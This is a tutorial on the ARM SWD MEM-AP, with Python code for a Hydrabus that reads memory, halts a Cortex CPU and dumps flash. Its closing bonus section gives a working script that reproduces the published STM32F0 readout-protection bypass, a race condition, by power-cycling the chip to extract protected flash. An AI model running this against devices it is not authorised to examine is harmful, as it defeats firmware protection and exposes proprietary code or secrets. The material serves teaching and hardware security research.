SWD part 2 : the MEM-AP

After part 1, you should now be familiar with the basics of SWD. We finished the article at the gates of an important part of the SWD architecture: the MEM-AP.

The MEM-AP (MEMory Access Port) provides read and write access to the memory space of the CPU. This is the part used to access the SRAM, Flash, and registers of the target device. Again, the MEM-AP is the same on all Cortex processors and is defined in the ARM Debug Interface Architecture Specification.

Preparing the ground

Before going further into details, let’s first rewrite the code provided in the first article to create primitive functions for accessing the bus :

DP access

The DP (Debug Port) is our entry point on the bus. It will handle all requests and forward them to the correct AP when needed. These basic functions will help us communicate directly with the DP :

import pyHydrabus

#Setup the Hydrabus interface for SWD
r = pyHydrabus.RawWire('/dev/ttyACM0')
r._config = 0xa
r._configure_port()

def init():
    """ Init SWD interface
    """
    r.write(b'\xff\xff\xff\xff\xff\xff\x7b\x9e\xff\xff\xff\xff\xff\xff\x0f')
    sync()

def sync():         
    r.write(b'\x00')

def apply_dp_parity(value):
    tmp = value & 0b00011110
    if(bin(tmp).count('1')%2) == 1:
        value = value | 1<<5
    return value

def read_dp(addr, to_ap=0):    
    """ Read a value from DP register <addr>
    <to_ap> defines if the request has to be forwarded to an AP
    Returns the 32-bit value as an int
    """                                     
    CMD = 0x85
    CMD = CMD | to_ap << 1
    CMD = CMD | (addr & 0b1100) << 1
    CMD = apply_dp_parity(CMD)

    r.write(CMD.to_bytes(1, byteorder="little"))
    status = 0
    for i in range(3):
        status += ord(r.read_bit())<<i
    if status == 1:
        retval = int.from_bytes(r.read(4), byteorder="little")
        sync()
        return retval
    else:
        sync()
        raise ValueError(f"Returned status is {hex(status)}")

def write_dp(addr, value, to_ap=0):
    """ Write <value> to DP register <addr>
    """
    CMD = 0x81
    CMD = CMD | to_ap << 1
    CMD = CMD | (addr & 0b1100) << 1
    CMD = apply_dp_parity(CMD)

    r.write(CMD.to_bytes(1, byteorder="little"))
    status = 0
    for i in range(3):
        status += ord(r.read_bit())<<i
    r.clocks(2)
    if status != 1:
        sync()
        raise ValueError(f"Returned status is {hex(status)}")
    r.write(value.to_bytes(4, byteorder="little"))

    #Send the parity bit along with the sync clocks
    if(bin(value).count('1')%2) == 1:
        r.write(b'\x01')
    else:
        r.write(b'\x00')
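
To make the bit layout of the request byte explicit, here is a small sketch that builds the same byte as read_dp() and write_dp() without touching any hardware. The helper name build_request is ours and is not part of pyHydrabus; it only mirrors the arithmetic used above.

```python
def build_request(addr, rnw, apndp=0):
    """Build the 8-bit SWD request for register <addr>.

    Bit 0 is start (1), bit 1 APnDP, bit 2 RnW, bits 3-4 A[3:2],
    bit 5 parity, bit 6 stop (0), bit 7 park (1).
    """
    request = 0x81                       # start and park bits
    request |= (apndp & 1) << 1          # 0 targets the DP, 1 an AP
    request |= (rnw & 1) << 2            # 1 for a read, 0 for a write
    request |= (addr & 0b1100) << 1      # A[3:2] land on bits 3-4
    # Parity covers APnDP, RnW and the two address bits
    if bin(request & 0b00011110).count("1") % 2 == 1:
        request |= 1 << 5
    return request

dpidr_read = build_request(0x0, rnw=1)    # read DP register 0 (DPIDR)
select_write = build_request(0x8, rnw=0)  # write DP register 8 (SELECT)
print(hex(dpidr_read), hex(select_write))
```

Printing the bytes this way is a convenient check when comparing the script against a logic analyzer capture.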

AP access

Now that we have basic DP functions, we can use them to access the APs on the bus. Refer to part 1 if you need a refresh on how to select a specific register on an AP :

def read_ap(address, bank):
    """ Read register <bank> from AP at <address>
    Returns the 32-bit value as an int
    """        
    select_reg = 0

    #Place AP address in DP SELECT register
    select_reg = select_reg | address << 24

    #Place bank in register as well
    select_reg = select_reg | (bank & 0b11110000)

    #Write the SELECT DP register
    write_dp(8, select_reg)
    #AP reads are posted: this first read only starts the transfer
    read_dp((bank & 0b1100), to_ap=1)

    #Read RDBUFF
    return read_dp(0xc)

def write_ap(address, bank, value):
    """ Write <value> to  register <bank> of AP at <address>
    """        
    select_reg = 0

    #Place AP address in DP SELECT register
    select_reg = select_reg | address << 24

    #Place bank in register as well
    select_reg = select_reg | (bank & 0b11110000)

    #Write the SELECT DP register
    write_dp(8, select_reg)

    #Send the actual value to the AP
    write_dp( (bank&0b1100),
            value,
            to_ap=1)
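
Both functions split the register offset in two: the upper nibble goes into the DP SELECT register and bits [3:2] travel in the request itself. The sketch below isolates that split so it can be checked without hardware. The names build_select and bank_offset are hypothetical helpers introduced for illustration.

```python
def build_select(ap_address, register):
    """Return the DP SELECT value that exposes AP <register>.

    SELECT[31:24] holds the AP address,
    SELECT[7:4] holds the register bank.
    """
    return ((ap_address & 0xFF) << 24) | (register & 0xF0)

def bank_offset(register):
    """Return the A[3:2] bits that are sent in the request byte."""
    return register & 0b1100

# Register 0xfc of AP 0, as used by the scanning loop
print(hex(build_select(0, 0xFC)), hex(bank_offset(0xFC)))
```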

Now that we have those primitives, we can recreate the AP scanning code seen in part 1 in a more readable way :

#init SWD bus
init()
print(f"DPIDR: {hex(read_dp(0))}")

#Power up debug domain
write_dp(4, 0x50000000)

#Scan the SWD bus
for i in range(256):
    print(f"AP {i} IDCODE: {hex(read_ap(i, 0xfc))}")
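
Most of the 256 addresses will return zero, which the ARM specification defines as "no AP present". As a rough sketch, the values printed by the loop can be filtered and split into fields. The field positions below are taken from our reading of the ADIv5 specification and should be checked against it; the sample value is illustrative and was not read from a real target.

```python
def decode_idr(idr):
    """Split an AP identification value into its main fields."""
    return {
        "revision": (idr >> 28) & 0xF,
        "designer": (idr >> 17) & 0x7FF,  # JEP-106 code, 0x23b is ARM
        "variant": (idr >> 4) & 0xF,
        "type": idr & 0xF,                # 0x1 is an AHB MEM-AP
    }

def is_present(idr):
    """An identification value of zero means no AP at that address."""
    return idr != 0

example = 0x04770021   # illustrative value only
print(decode_idr(example), is_present(example))
```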

That’s it! Way more readable, isn’t it? Now let’s continue and dig into the MEM-AP.

MEM-AP interaction

Registers

The MEM-AP has several registers used to configure and interact with the memory of the target processor. The main ones are described below :

CSW (Address 0x00)

Control and Status Word register. It holds the configuration of MEM-AP transfers. The interesting part is the lowest three bits [2:0], which set the transfer width. By default it is set to 0b010 (32 bits), but it is possible to select other sizes (which ones are supported is implementation-dependent).

TAR (Address 0x04)

The Transfer Address Register holds the memory address to be accessed by the MEM-AP.

DRW (Address 0x0c)

The Data Read Write register is used to transfer data to/from the processor memory. Reading this register will trigger a 32-bit (by default) transfer from the processor memory space at address set in the TAR register to this register. The value will then be sent to the external debugger. Writing to this register will store the value sent by the external debugger to the register, then transfer the value to the memory location pointed to by the TAR register.

Using these three registers, it is possible to perform any memory access for data up to 32 bits. For simplicity, we won’t cover additional methods like banked transfers, but you can find all the documentation in the architecture specs.
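
As an illustration of the CSW size field, the sketch below changes only bits [2:0] of a CSW value and leaves the rest untouched. The encodings for 8, 16 and 32 bits come from the ARM specification; the helper names and the sample CSW value are assumptions made for the example.

```python
CSW_SIZE_MASK = 0b111
SIZE_ENCODING = {8: 0b000, 16: 0b001, 32: 0b010}

def set_transfer_size(csw, bits):
    """Return <csw> with its size field set for <bits>-bit transfers."""
    if bits not in SIZE_ENCODING:
        raise ValueError(f"Unsupported transfer size: {bits}")
    return (csw & ~CSW_SIZE_MASK) | SIZE_ENCODING[bits]

def get_transfer_size(csw):
    """Return the transfer width in bits, or None if not listed here."""
    for bits, code in SIZE_ENCODING.items():
        if (csw & CSW_SIZE_MASK) == code:
            return bits
    return None

csw = 0x23000052   # illustrative value, not read from a real target
print(get_transfer_size(csw), hex(set_transfer_size(csw, 8)))
```

With the primitives defined earlier, the new value would be written back with write_ap(0, 0x0, ...) after reading the current one with read_ap(0, 0x0). Whether the target accepts 8-bit or 16-bit accesses depends on the implementation.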

Memory transfer

The following code transfers 4 bytes (32 bits) from the device RAM (address 0x20000000) to the host :

#Assume MEM-AP is at address 0 on the bus

#Set TAR register to 0x20000000
write_ap(0, 0x4, 0x20000000)
#Read DRW register and convert data to bytes
val = read_ap(0, 0xc).to_bytes(4, byteorder="little")

print(val.hex())

Using this, it is possible to read all of the target device SRAM by looping over the addresses. This works quite well, but if we do the same with the flash, it will sometimes fail because the DP responds with a WAIT status.

It turns out that the CPU and the MEM-AP share the AHB bus inside the microcontroller, and they compete for it while the CPU is running. In that situation, the specs say that the transfer has to be retried. This is far from optimal, so let’s see how to stop the CPU :
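
For reference, the retry approach mentioned by the specs could look roughly like the sketch below. It assumes the transfer raises an exception exposing the 3-bit ACK value; the AckError class and retry_on_wait helper are hypothetical, since the functions in this article raise a plain ValueError. A stand-in transfer is used so the sketch runs without a target.

```python
ACK_OK = 0b001
ACK_WAIT = 0b010
ACK_FAULT = 0b100

class AckError(Exception):
    """Hypothetical exception carrying the 3-bit ACK value."""
    def __init__(self, status):
        super().__init__(f"Returned status is {hex(status)}")
        self.status = status

def retry_on_wait(transfer, retries=10):
    """Call <transfer> again as long as the target answers WAIT."""
    for _ in range(retries):
        try:
            return transfer()
        except AckError as error:
            if error.status != ACK_WAIT:
                raise                     # FAULT and others are not retried
    raise TimeoutError(f"Still WAIT after {retries} attempts")

# Stand-in for a real transfer: WAIT twice, then succeed
answers = [ACK_WAIT, ACK_WAIT, ACK_OK]
def fake_transfer():
    status = answers.pop(0)
    if status != ACK_OK:
        raise AckError(status)
    return 0xCAFEBABE

print(hex(retry_on_wait(fake_transfer)))
```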

Cortex debug registers

This time, we have to dig into the CPU technical reference manual to find the DHCSR register. This register controls the debugging features of the CPU, including the C_HALT[1] and C_DEBUGEN[0] bits. Changing their value to 1 will cause the CPU to stop its execution, and writing a zero will make the CPU continue its execution. The documentation tells us that this register location is in the CPU memory at address 0xE000EDF0, so we can create more helper functions :

def halt_cpu():
    #Set MEM-AP TAR to 0xE000EDF0
    write_ap(0, 0x4, 0xE000EDF0)
    #Write to MEM-AP DRW, setting the DHCSR bits C_HALT and C_DEBUGEN
    write_ap(0, 0xc, 0xA05F0003)

def run_cpu():
    write_ap(0, 0x4, 0xE000EDF0)
    write_ap(0, 0xc, 0xA05F0000)
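
The constants 0xA05F0003 and 0xA05F0000 are easier to read once split into fields. In the sketch below, the upper half-word 0xA05F is the debug key that ARM requires on DHCSR writes, and S_HALT (bit 17) is the status bit that reports a halted core. Both come from the ARM architecture manuals rather than from the code above, and the helper names are ours.

```python
DHCSR_ADDRESS = 0xE000EDF0
DBGKEY = 0xA05F << 16      # key required on every write to DHCSR
C_DEBUGEN = 1 << 0
C_HALT = 1 << 1
S_HALT = 1 << 17           # read-only status bit

def dhcsr_value(halt):
    """Return the word to write to DHCSR to halt or resume the CPU."""
    value = DBGKEY
    if halt:
        value |= C_DEBUGEN | C_HALT
    return value

def is_halted(dhcsr):
    """Tell whether a value read back from DHCSR reports a halted core."""
    return bool(dhcsr & S_HALT)

print(hex(dhcsr_value(True)), hex(dhcsr_value(False)))
```

After calling halt_cpu(), reading DHCSR back through TAR and DRW and passing the result to is_halted() would be one way to confirm that the core really stopped before dumping memory.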

And now our script to dump a microcontroller flash becomes :

buff = b''

#SWD init
init()
read_dp(0)
write_dp(4, 0x50000000)

halt_cpu()

for i in range(0,0xc00,4):
    write_ap(0, 0x4, 0x08000000+i)
    val = read_ap(0, 0xc).to_bytes(4, byteorder="little")
    buff = buff+val

run_cpu()
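
The same loop can be wrapped in a reusable function. The sketch below takes the word-reading routine as a parameter so that it can be exercised without hardware; dump_memory and fake_read_word are hypothetical names used for illustration. On a real target, the reader would set TAR with write_ap(0, 0x4, address) and return read_ap(0, 0xc).

```python
def dump_memory(read_word, base, length):
    """Read <length> bytes starting at <base>, one 32-bit word at a time.

    <read_word> is any callable taking an address and returning an int.
    """
    chunks = []
    for offset in range(0, length, 4):
        word = read_word(base + offset)
        chunks.append(word.to_bytes(4, byteorder="little"))
    # Joining once avoids rebuilding the buffer on every iteration
    return b"".join(chunks)

# Stand-in reader so the sketch runs without a target
def fake_read_word(address):
    return address & 0xFFFFFFFF

image = dump_memory(fake_read_word, 0x08000000, 16)
print(image.hex())
```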

Bonus: reproduce STM32F0 race condition bug

In 2017, researchers from the Fraunhofer institute presented a vulnerability in the STM32F0 family of microcontrollers that allowed the readout protection to be bypassed. The vulnerability was caused by the fact that the protection was set up during the first AHB transfer done by the MEM-AP, so it was sometimes possible to read the result of an AHB transfer before the readout protection was enforced.

By using the primitives we created in this article, it is possible to reproduce this attack. The only catch is that the target MCU has to be powered off after each transfer to reset the readout protection. In order to do this, we used a simple MOSFET driven by an auxiliary GPIO to power the STM32F0 on or off :

import time
import hexdump

d = b""

# Setup auxiliary pin
r.AUX[0].direction=pyHydrabus.OUTPUT
r.AUX[0].value = 0

x = 0
while(x < 0x4000):
    try:
        r.AUX[0].value = 1
        time.sleep(0.001)
        init()
        read_dp(0)
        write_dp(4, 0x50000000)
        write_ap(0, 0x4, 0x08000000+x)
        val = read_ap(0, 0xc).to_bytes(4, byteorder="little")
        r.AUX[0].value = 0
        d = d+val
        print(f"{hex(x)}:{val.hex()}")
        x = x+4
    except ValueError:
        r.AUX[0].value = 0
        continue

r.close()
hexdump.hexdump(d)                                                 

Running the script, it took around five minutes to retrieve the whole 16KB of the flash. Not so bad!
